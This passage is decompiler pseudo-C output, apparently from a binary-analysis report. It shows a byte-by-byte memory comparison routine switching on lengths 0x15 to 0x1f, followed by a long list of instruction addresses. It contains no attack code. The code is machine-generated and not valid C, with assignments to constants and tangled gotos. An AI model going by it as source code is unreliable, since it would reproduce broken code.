                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L131;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L128;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L126;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L124;
                  						case 0x15:
                  							L201:
                  							__edx =  *(__eax - 0x15);
                  							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
                  								__esi = 0;
                  								L211:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L212;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x15) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  							if(__esi == 0) {
                  								L204:
                  								__esi =  *(__eax - 0x14) & 0x000000ff;
                  								__edx =  *(__ecx - 0x14) & 0x000000ff;
                  								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  								if(__esi == 0) {
                  									L206:
                  									__esi =  *(__eax - 0x13) & 0x000000ff;
                  									__edx =  *(__ecx - 0x13) & 0x000000ff;
                  									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  									if(__esi == 0) {
                  										L208:
                  										__esi =  *(__eax - 0x12) & 0x000000ff;
                  										__edx =  *(__ecx - 0x12) & 0x000000ff;
                  										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L211;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L208;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L206;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L204;
                  						case 0x16:
                  							L280:
                  							__edx =  *(__eax - 0x16);
                  							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
                  								__esi = 0;
                  								L290:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L291;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x16) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  							if(__esi == 0) {
                  								L283:
                  								__esi =  *(__eax - 0x15) & 0x000000ff;
                  								__edx =  *(__ecx - 0x15) & 0x000000ff;
                  								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  								if(__esi == 0) {
                  									L285:
                  									__esi =  *(__eax - 0x14) & 0x000000ff;
                  									__edx =  *(__ecx - 0x14) & 0x000000ff;
                  									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  									if(__esi == 0) {
                  										L287:
                  										__esi =  *(__eax - 0x13) & 0x000000ff;
                  										__edx =  *(__ecx - 0x13) & 0x000000ff;
                  										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L290;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L287;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L285;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L283;
                  						case 0x17:
                  							L361:
                  							__edx =  *(__eax - 0x17);
                  							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
                  								__esi = 0;
                  								L371:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L372;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x17) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                  							if(__esi == 0) {
                  								L364:
                  								__esi =  *(__eax - 0x16) & 0x000000ff;
                  								__edx =  *(__ecx - 0x16) & 0x000000ff;
                  								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  								if(__esi == 0) {
                  									L366:
                  									__esi =  *(__eax - 0x15) & 0x000000ff;
                  									__edx =  *(__ecx - 0x15) & 0x000000ff;
                  									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  									if(__esi == 0) {
                  										L368:
                  										__esi =  *(__eax - 0x14) & 0x000000ff;
                  										__edx =  *(__ecx - 0x14) & 0x000000ff;
                  										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L371;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L368;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L366;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L364;
                  						case 0x18:
                  							L110:
                  							__edx =  *(__eax - 0x18);
                  							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
                  								__esi = 0;
                  								L120:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L121;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x18) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                  							if(__esi == 0) {
                  								L113:
                  								__esi =  *(__eax - 0x17) & 0x000000ff;
                  								__edx =  *(__ecx - 0x17) & 0x000000ff;
                  								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                  								if(__esi == 0) {
                  									L115:
                  									__esi =  *(__eax - 0x16) & 0x000000ff;
                  									__edx =  *(__ecx - 0x16) & 0x000000ff;
                  									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  									if(__esi == 0) {
                  										L117:
                  										__esi =  *(__eax - 0x15) & 0x000000ff;
                  										__edx =  *(__ecx - 0x15) & 0x000000ff;
                  										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L120;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L117;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L115;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L113;
                  						case 0x19:
                  							L190:
                  							__edx =  *(__eax - 0x19);
                  							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
                  								__esi = 0;
                  								L200:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L201;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x19) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  							if(__esi == 0) {
                  								L193:
                  								__esi =  *(__eax - 0x18) & 0x000000ff;
                  								__edx =  *(__ecx - 0x18) & 0x000000ff;
                  								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                  								if(__esi == 0) {
                  									L195:
                  									__esi =  *(__eax - 0x17) & 0x000000ff;
                  									__edx =  *(__ecx - 0x17) & 0x000000ff;
                  									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                  									if(__esi == 0) {
                  										L197:
                  										__esi =  *(__eax - 0x16) & 0x000000ff;
                  										__edx =  *(__ecx - 0x16) & 0x000000ff;
                  										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L200;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L197;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L195;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L193;
                  						case 0x1a:
                  							L269:
                  							__edx =  *(__eax - 0x1a);
                  							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
                  								__esi = 0;
                  								L279:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L280;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  							if(__esi == 0) {
                  								L272:
                  								__esi =  *(__eax - 0x19) & 0x000000ff;
                  								__edx =  *(__ecx - 0x19) & 0x000000ff;
                  								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  								if(__esi == 0) {
                  									L274:
                  									__esi =  *(__eax - 0x18) & 0x000000ff;
                  									__edx =  *(__ecx - 0x18) & 0x000000ff;
                  									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                  									if(__esi == 0) {
                  										L276:
                  										__esi =  *(__eax - 0x17) & 0x000000ff;
                  										__edx =  *(__ecx - 0x17) & 0x000000ff;
                  										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L279;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L276;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L274;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L272;
                  						case 0x1b:
                  							L350:
                  							__edx =  *(__eax - 0x1b);
                  							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
                  								__esi = 0;
                  								L360:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L361;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  							if(__esi == 0) {
                  								L353:
                  								__esi =  *(__eax - 0x1a) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  								if(__esi == 0) {
                  									L355:
                  									__esi =  *(__eax - 0x19) & 0x000000ff;
                  									__edx =  *(__ecx - 0x19) & 0x000000ff;
                  									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  									if(__esi == 0) {
                  										L357:
                  										__esi =  *(__eax - 0x18) & 0x000000ff;
                  										__edx =  *(__ecx - 0x18) & 0x000000ff;
                  										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L360;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L357;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L355;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L353;
                  						case 0x1c:
                  							__edx =  *(__eax - 0x1c);
                  							if( *(__eax - 0x1c) ==  *(__ecx - 0x1c)) {
                  								__esi = 0;
                  								L109:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L110;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  							if(__esi == 0) {
                  								L102:
                  								__esi =  *(__eax - 0x1b) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  								if(__esi == 0) {
                  									L104:
                  									__esi =  *(__eax - 0x1a) & 0x000000ff;
                  									__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  									__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  									if(__esi == 0) {
                  										L106:
                  										__esi =  *(__eax - 0x19) & 0x000000ff;
                  										__edx =  *(__ecx - 0x19) & 0x000000ff;
                  										__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L109;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L106;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L104;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L102;
                  						case 0x1d:
                  							__edx =  *(__eax - 0x1d);
                  							if( *(__eax - 0x1d) ==  *(__ecx - 0x1d)) {
                  								__esi = 0;
                  								L189:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L190;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  							if(__esi == 0) {
                  								L182:
                  								__esi =  *(__eax - 0x1c) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  								if(__esi == 0) {
                  									L184:
                  									__esi =  *(__eax - 0x1b) & 0x000000ff;
                  									__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  									__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  									if(__esi == 0) {
                  										L186:
                  										__esi =  *(__eax - 0x1a) & 0x000000ff;
                  										__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  										__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L189;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L186;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L184;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L182;
                  						case 0x1e:
                  							__edx =  *(__eax - 0x1e);
                  							if( *(__eax - 0x1e) ==  *(__ecx - 0x1e)) {
                  								__esi = 0;
                  								L268:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L269;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  							if(__esi == 0) {
                  								L261:
                  								__esi =  *(__eax - 0x1d) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  								if(__esi == 0) {
                  									L263:
                  									__esi =  *(__eax - 0x1c) & 0x000000ff;
                  									__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  									__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  									if(__esi == 0) {
                  										L265:
                  										__esi =  *(__eax - 0x1b) & 0x000000ff;
                  										__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  										__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L268;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L265;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L263;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L261;
                  						case 0x1f:
                  							__edx =  *(__eax - 0x1f);
                  							if( *(__eax - 0x1f) ==  *(__ecx - 0x1f)) {
                  								__esi = 0;
                  								L349:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L350;
                  							}
                  							__edx =  *(__ecx - 0x1f) & 0x000000ff;
                  							__esi =  *(__eax - 0x1f) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                  							if(__esi == 0) {
                  								L342:
                  								__esi =  *(__eax - 0x1e) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  								if(__esi == 0) {
                  									L344:
                  									__esi =  *(__eax - 0x1d) & 0x000000ff;
                  									__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  									__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  									if(__esi == 0) {
                  										L346:
                  										__esi =  *(__eax - 0x1c) & 0x000000ff;
                  										__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  										__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L349;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L346;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L344;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L342;
                  					}
                  				}
                  			}




















































                  0x0042003f
                  0x00420044
                  0x00420047
                  0x00000000
                  0x00421632
                  0x0042004d
                  0x0042004e
                  0x00421627
                  0x0042162a
                  0x00421591
                  0x00421591
                  0x00421593
                  0x00421637
                  0x00421637
                  0x00421637
                  0x00000000
                  0x004215a4
                  0x00420054
                  0x00420055
                  0x004215f3
                  0x004215f6
                  0x004215ff
                  0x00421601
                  0x00421614
                  0x00421614
                  0x00421618
                  0x00000000
                  0x00421618
                  0x0042160e
                  0x00421612
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421612
                  0x0042005b
                  0x0042005c
                  0x004215ab
                  0x004215ae
                  0x004215b7
                  0x004215b9
                  0x004215cc
                  0x004215d4
                  0x004215d6
                  0x004215e9
                  0x004215e9
                  0x004215ed
                  0x00000000
                  0x004215ed
                  0x004215e3
                  0x004215e7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004215e7
                  0x004215c6
                  0x004215ca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004215ca
                  0x00420063
                  0x00421522
                  0x00421525
                  0x0042152e
                  0x00421530
                  0x00421547
                  0x0042154f
                  0x00421551
                  0x00421568
                  0x00421570
                  0x00421572
                  0x00421589
                  0x00421589
                  0x0042158d
                  0x00000000
                  0x0042158d
                  0x0042157f
                  0x00421583
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421583
                  0x0042155e
                  0x00421562
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421562
                  0x0042153d
                  0x00421541
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420069
                  0x00420069
                  0x0042006c
                  0x00420072
                  0x004204ea
                  0x0042007c
                  0x004200fa
                  0x004200fc
                  0x004200fe
                  0x00420506
                  0x00420506
                  0x004208db
                  0x00000000
                  0x004208db
                  0x0042010a
                  0x0042018a
                  0x0042018c
                  0x0042018e
                  0x00000000
                  0x00000000
                  0x0042019a
                  0x0042021a
                  0x0042021c
                  0x0042021e
                  0x00000000
                  0x00000000
                  0x0042022a
                  0x004202aa
                  0x004202ac
                  0x004202ae
                  0x00000000
                  0x00000000
                  0x004202ba
                  0x0042033a
                  0x0042033c
                  0x0042033e
                  0x00000000
                  0x00000000
                  0x0042034a
                  0x004203ca
                  0x004203cc
                  0x004203ce
                  0x00000000
                  0x00000000
                  0x004203da
                  0x0042045a
                  0x0042045c
                  0x0042045e
                  0x00000000
                  0x00000000
                  0x0042046a
                  0x004204de
                  0x004204e0
                  0x004204e2
                  0x00000000
                  0x004204e4
                  0x004204e4
                  0x004204e6
                  0x004204e8
                  0x00000000
                  0x004204e8
                  0x004204e2
                  0x00420474
                  0x00420476
                  0x00420489
                  0x00420491
                  0x00420493
                  0x004204a6
                  0x004204ae
                  0x004204b0
                  0x004204c3
                  0x004204cb
                  0x004204cd
                  0x004204da
                  0x004204da
                  0x00000000
                  0x004204cd
                  0x004204bd
                  0x004204c1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004204c1
                  0x004204a0
                  0x004204a4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004204a4
                  0x00420483
                  0x00420487
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420487
                  0x004203e4
                  0x004203e6
                  0x004203fd
                  0x00420405
                  0x00420407
                  0x0042041e
                  0x00420426
                  0x00420428
                  0x0042043f
                  0x00420447
                  0x00420449
                  0x00420456
                  0x00420456
                  0x00000000
                  0x00420449
                  0x00420435
                  0x00420439
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420439
                  0x00420414
                  0x00420418
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420418
                  0x004203f3
                  0x004203f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004203f7
                  0x00420354
                  0x00420356
                  0x0042036d
                  0x00420375
                  0x00420377
                  0x0042038e
                  0x00420396
                  0x00420398
                  0x004203af
                  0x004203b7
                  0x004203b9
                  0x004203c6
                  0x004203c6
                  0x00000000
                  0x004203b9
                  0x004203a5
                  0x004203a9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004203a9
                  0x00420384
                  0x00420388
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420388
                  0x00420363
                  0x00420367
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420367
                  0x004202c4
                  0x004202c6
                  0x004202dd
                  0x004202e5
                  0x004202e7
                  0x004202fe
                  0x00420306
                  0x00420308
                  0x0042031f
                  0x00420327
                  0x00420329
                  0x00420336
                  0x00420336
                  0x00000000
                  0x00420329
                  0x00420315
                  0x00420319
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420319
                  0x004202f4
                  0x004202f8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004202f8
                  0x004202d3
                  0x004202d7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004202d7
                  0x00420234
                  0x00420236
                  0x0042024d
                  0x00420255
                  0x00420257
                  0x0042026e
                  0x00420276
                  0x00420278
                  0x0042028f
                  0x00420297
                  0x00420299
                  0x004202a6
                  0x004202a6
                  0x00000000
                  0x00420299
                  0x00420285
                  0x00420289
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420289
                  0x00420264
                  0x00420268
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420268
                  0x00420243
                  0x00420247
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420247
                  0x004201a4
                  0x004201a6
                  0x004201bd
                  0x004201c5
                  0x004201c7
                  0x004201de
                  0x004201e6
                  0x004201e8
                  0x004201ff
                  0x00420207
                  0x00420209
                  0x00420216
                  0x00420216
                  0x00000000
                  0x00420209
                  0x004201f5
                  0x004201f9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004201f9
                  0x004201d4
                  0x004201d8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004201d8
                  0x004201b3
